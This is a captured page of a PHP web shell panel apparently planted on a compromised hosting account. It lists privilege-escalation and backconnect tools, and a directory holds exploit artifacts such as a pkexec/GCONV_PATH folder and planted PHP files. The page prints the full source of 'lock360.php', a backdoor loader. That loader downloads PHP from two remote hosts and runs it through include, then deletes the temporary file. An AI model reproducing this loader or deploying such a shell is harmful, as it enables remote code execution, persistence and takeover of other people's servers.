Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
cepatjitu.com /
.well-known /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
pki-validation
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
BDKR.txt
12.02
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
error_log
1.15
KB
-rw-r--r--
info.php
1.87
MB
-rw-r--r--
j4em7kwh.php
12.03
KB
-rw-r--r--
lock360.php
1.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lock360.php
<?php function GC($a) { $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); } return $code; } if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { $code = GC('https://c.zvo1.xyz/'); if (!$code) { $code = GC('https://c2.icw7.com/'); } $need = '<' . '?' . 'php'; if (strpos($code, $need) === false) { die('get failed'); } if(function_exists('tmpfile')){ $file_name = tmpfile(); } if($file_name) { fwrite($file_name, $code); $a = stream_get_meta_data($file_name); $file_path = $a['uri']; @include($file_path); fclose($file_name); }else { $file_path = '.c'; file_put_contents($file_path, $code); @include($file_path); } @unlink($file_path); die(); }
Close